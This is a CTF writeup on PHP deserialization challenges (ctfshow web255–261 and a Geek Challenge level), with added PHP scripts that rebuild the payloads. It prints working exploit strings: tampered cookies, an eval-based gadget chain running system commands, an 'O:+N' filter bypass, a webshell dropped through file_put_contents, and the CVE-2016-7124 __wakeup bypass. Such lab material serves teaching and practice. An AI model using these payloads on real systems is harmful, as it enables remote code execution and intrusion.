Deserialization practice problems
web255
Set isVip to true in a local copy of the class, then serialize: echo urlencode($v=serialize($f=new ctfShowUser()));
Cookie: user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
GET: username=xxxxxx&password=xxxxxx (login() compares with ===, so both values must match the ones in the serialized object exactly)
web256
Serialize: echo urlencode($v=serialize(new ctfShowUser()));
Set isVip to true and, in the local copy of the class, give username a value different from password (this level additionally requires username !== password), then send the serialized object in the cookie.
The username and password GET parameters must equal the values stored in the serialized object.
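Worked example for web255/web256 (added here; not the writeup's own code). The ctfShowUser class below is a reconstruction from the writeup's description (public properties, login() with ===, checkVip(), web256's username !== password rule), so the real challenge source may differ in details. It builds the cookie and replays it through the same checks so the required GET parameters are obvious.

```php
<?php
// Added example, not the challenge code. Class layout reconstructed from the writeup.
class ctfShowUser {
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';
    public $isVip    = false;

    public function checkVip(): bool { return $this->isVip; }

    // Strict comparison: the GET values must be byte-for-byte the serialized ones.
    public function login(string $u, string $p): bool {
        return $this->username === $u && $this->password === $p;
    }

    public function vipOneKeyGetFlag(): string {
        if (!$this->isVip) { return 'no vip, no flag'; }
        if ($this->username === $this->password) { return 'no flag'; }  // web256 extra rule
        return 'flag';  // stands in for echoing the real $flag
    }
}

// Tamper with the object: flip isVip and make the two credentials differ (web256).
$u = new ctfShowUser();
$u->isVip    = true;
$u->password = 'yyyyyy';

$cookie = urlencode(serialize($u));
echo "Cookie: user=$cookie\n";
echo "GET: ?username={$u->username}&password={$u->password}\n";

// Replay of the server-side logic with the values we would send.
function replay(string $cookie, string $username, string $password): string {
    $user = unserialize(urldecode($cookie));   // $_COOKIE['user'] is already decoded on a real server
    if ($user->login($username, $password) && $user->checkVip()) {
        return $user->vipOneKeyGetFlag();
    }
    return 'no vip, no flag';
}

echo replay($cookie, 'xxxxxx', 'yyyyyy'), "\n";   // GET values match the serialized object
echo replay($cookie, 'xxxxxx', 'xxxxxx'), "\n";   // password differs from the serialized value
```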
web257
In the local copy, change __construct() so that $this->class is a backDoor object instead of info, and set backDoor's $code to the command to run. On the server, __destruct() calls $this->class->getInfo(), and backDoor::getInfo() does eval($this->code), so the command executes when the deserialized object is destroyed.
Serialize: echo urlencode($v=serialize(new ctfShowUser())); the properties are private, so their names are serialized as \0ctfShowUser\0username etc., and the null bytes must be kept as %00 in the cookie.
Cookie:user=O%3A11%3A%22ctfShowUser%22%3A4%3A%7Bs%3A21%3A%22%00ctfShowUser%00username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A21%3A%22%00ctfShowUser%00password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A18%3A%22%00ctfShowUser%00isVip%22%3Bb%3A0%3Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A17%3A%22system%28%22tac+f%2A%22%29%3B%22%3B%7D%7D
web258
Same as the previous level plus a regex filter that rejects O: or C: followed by digits, e.g. O:8 is blocked:
preg_match('/[oc]:\d+:/i', $_COOKIE['user'])
Putting a plus sign in front of the length bypasses it: O:+8 does not match \d+, but unserialize() still accepts a signed length.
So on top of the previous payload add $a=str_replace('O:', 'O:+',$a) to insert the plus sign before every object length (both the outer ctfShowUser and the nested backDoor), then URL-encode as before.
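Worked example for web257/web258 (added here; not the writeup's own code). The classes are reconstructed from the writeup's description (private properties, __destruct() calling $this->class->getInfo(), backDoor::getInfo() doing eval($this->code)); eval is replaced by a plain return so the script is safe to run. It builds the nested-object cookie, applies the "O:+N" trick and checks both the filter and unserialize().

```php
<?php
// Added example, not the challenge code. Class layouts reconstructed from the writeup.
class backDoor {
    private $code;
    public function __construct(string $code) { $this->code = $code; }
    public function getInfo() { return $this->code; }   // challenge: eval($this->code);
}

class ctfShowUser {
    private $username = 'xxxxxx';
    private $password = 'xxxxxx';
    private $isVip    = false;
    private $class;
    // Challenge: $this->class = new info(); the local copy swaps in the gadget so it
    // is serialized inside the user object and is what __destruct() ends up calling.
    public function __construct(string $cmd) { $this->class = new backDoor($cmd); }
    public function getInfo() { return $this->class->getInfo(); }  // mirrors __destruct()'s call
}

// web258's filter: anything like O:8: or C:8: is rejected.
function blocked(string $s): bool {
    return preg_match('/[oc]:\d+:/i', $s) === 1;
}

// Prefix every object length with '+': O:11:"ctfShowUser" -> O:+11:"ctfShowUser".
// \d+ cannot match the '+', while unserialize() accepts a signed length.
function sign_lengths(string $s): string {
    return preg_replace('/O:(\d+):/', 'O:+$1:', $s);
}

$raw = serialize(new ctfShowUser('system("tac f*");'));
// Private names are mangled to "\0ctfShowUser\0username"; the NUL bytes only survive
// in a cookie when URL-encoded, which is where the %00 in the payload comes from.
echo "web257: user=" . urlencode($raw) . "\n";

$bypass = sign_lengths($raw);
echo "web258: user=" . urlencode($bypass) . "\n";

// Filter verdict for the plain and the signed payload.
var_dump(blocked($raw), blocked($bypass));
// The signed payload still deserializes to the same object graph, gadget included.
$obj = unserialize($bypass);
var_dump($obj instanceof ctfShowUser, $obj->getInfo());
```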
web261
Before PHP 7.4 there were no __unserialize() and __serialize() methods.
unserialize() triggers __unserialize() or __wakeup(); serialize() triggers __serialize() or __sleep().
In PHP 7.4 and later, if both __unserialize() and __wakeup() are defined, __wakeup() is ignored; if both __serialize() and __sleep() are defined, __sleep() is ignored.
__invoke() could give RCE via eval($this->code), but it only fires when the object is called as a function, which never happens here.
So __invoke(), __sleep() and __wakeup() can be disregarded: __wakeup() is skipped on the server because __unserialize() exists, and __sleep() only matters when generating the payload locally (remove it from the local copy, otherwise it blanks username and password before serialization).
Pass username and password to __construct($u,$p) when creating the ctfshowvip object. In __unserialize(), $code is set to username.password, i.e. "877.php<?php ...", which passes the loose comparison $this->code == 0x36d (877) in __destruct() because PHP 7 converts a leading-numeric string to its numeric prefix (PHP 8 compares such a string with an int as strings, so this relies on the target running PHP 7.4). __destruct() then calls file_put_contents(username, password), writing the webshell; finally visit 877.php.
?vip=O%3A10%3A%22ctfshowvip%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A7%3A%22877.php%22%3Bs%3A8%3A%22password%22%3Bs%3A37%3A%22%3C%3Fphp+system%28%22cat+%2Fflag_is_here%22%29%3B%3F%3E%0A%22%3Bs%3A4%3A%22code%22%3BN%3B%7D
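Worked example for web261 (added here; not the writeup's own code). ctfshowvip is reconstructed from the writeup (public username/password/code, __wakeup() that dies when either credential is set, __sleep() that blanks them, __unserialize() that sets code = username.password, __destruct() guarding file_put_contents with code == 0x36d); the file write is replaced by a boolean so nothing touches disk. It shows which magic methods actually fire on PHP 7.4+, why the payload is assembled by hand rather than with serialize(), and how the loose comparison behaves on this interpreter.

```php
<?php
// Added example, not the challenge code. Class reconstructed from the writeup.
class ctfshowvip {
    public $username;
    public $password;
    public $code;
    public static $calls = [];   // records which magic methods ran

    public function __construct($u = '', $p = '') { $this->username = $u; $this->password = $p; }

    public function __wakeup() {
        self::$calls[] = '__wakeup';
        if ($this->username != '' || $this->password != '') { throw new RuntimeException('error'); }
    }
    public function __sleep() {   // this is why serialize() on the local class is useless
        self::$calls[] = '__sleep';
        $this->username = ''; $this->password = '';
        return ['username', 'password', 'code'];
    }
    public function __unserialize(array $data) {   // PHP >= 7.4: takes precedence over __wakeup()
        self::$calls[] = '__unserialize';
        $this->username = $data['username'];
        $this->password = $data['password'];
        $this->code = $this->username . $this->password;
    }
    // Challenge: if ($this->code == 0x36d) file_put_contents($this->username, $this->password);
    public function wouldWrite(): bool { return $this->code == 0x36d; }   // 0x36d === 877
}

// Hand-build the O:...:{} body so the local __sleep() never gets a chance to run.
function vip_payload(string $file, string $content): string {
    $s  = 'O:10:"ctfshowvip":3:{';
    $s .= 's:8:"username";s:' . strlen($file) . ':"' . $file . '";';
    $s .= 's:8:"password";s:' . strlen($content) . ':"' . $content . '";';
    $s .= 's:4:"code";N;}';
    return $s;
}

$payload = vip_payload('877.php', '<?php system("cat /flag_is_here");?>' . "\n");
echo '?vip=' . urlencode($payload), "\n";

$obj = unserialize($payload);
echo 'magic methods fired: ' . implode(',', ctfshowvip::$calls), "\n";
echo 'code = ' . json_encode($obj->code), "\n";
// "877.php<?php ..." == 877: PHP 7 reduces the leading-numeric string to 877;
// PHP 8 compares a non-numeric string with an int as strings, so the guard fails there.
echo 'PHP ' . PHP_VERSION . ': file_put_contents would ' . ($obj->wouldWrite() ? 'run' : 'not run'), "\n";
```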
[极客大挑战 2019]PHP (__wakeup bypass)
A directory scan finds the backup www.zip.
index.php includes class.php and calls unserialize() on the select parameter.
class.php includes flag.php from __destruct() only if $this->username === 'admin' and the password survives the `!= 100` check (i.e. password == 100), so build the payload with new Name('admin','100'). __wakeup() resets username to guest, so __wakeup must be bypassed: raise the declared property count in the serialized string (O:4:"Name":2: becomes O:4:"Name":3:), which makes unserialize() skip __wakeup() (CVE-2016-7124, PHP < 5.6.25 / < 7.0.10). The properties are private, so URL-encode the payload to keep the %00 bytes in the property names.
Pass it as select to get the flag.
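Worked example for the __wakeup() bypass (added here; not the challenge's own code). Name is reconstructed from the writeup (private username/password, __construct($u,$p), __wakeup() resetting username to 'guest', __destruct() demanding password == 100 and username === 'admin'); the flag.php include is replaced by a boolean check. It generates the select payload with the property-count trick (CVE-2016-7124), URL-encodes the NUL bytes, and reports whether the local interpreter is still vulnerable.

```php
<?php
// Added example, not the challenge code. Class reconstructed from the writeup.
class Name {
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username, $password) {
        $this->username = $username;
        $this->password = $password;
    }
    public function __wakeup() { $this->username = 'guest'; }

    // The two conditions the challenge's __destruct() checks before including flag.php.
    public function passes(): bool {
        return $this->password == 100 && $this->username === 'admin';
    }
}

$raw = serialize(new Name('admin', '100'));
// O:4:"Name":2:{s:14:"\0Name\0username";s:5:"admin";s:14:"\0Name\0password";s:3:"100";}

// Declare one more property than is present. PHP < 5.6.25 / < 7.0.10 still builds the
// object but skips __wakeup(), so username stays 'admin'; patched versions reject the
// string (unserialize() returns false), which is the first thing to check.
function bump_count(string $serialized): string {
    return preg_replace_callback(
        '/^O:4:"Name":(\d+):/',
        function (array $m) { return 'O:4:"Name":' . ($m[1] + 1) . ':'; },
        $serialized
    );
}

$payload = bump_count($raw);
// Private names carry NUL bytes; they only reach the server intact when URL-encoded.
echo '?select=' . urlencode($payload), "\n";

// What this interpreter does with the bumped payload.
$obj = @unserialize($payload);
if ($obj === false) {
    echo 'PHP ' . PHP_VERSION . ' rejects the count mismatch; target must be < 5.6.25 / < 7.0.10', "\n";
} else {
    echo '__wakeup skipped, checks pass: ' . var_export($obj->passes(), true), "\n";
}

// For comparison, the untampered payload always goes through __wakeup().
$plain = unserialize($raw);
echo 'untampered payload passes: ' . var_export($plain->passes(), true), "\n";
```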
Tags: serialize, deserialization, practice problems. From: https://www.cnblogs.com/sunrise123/p/18367479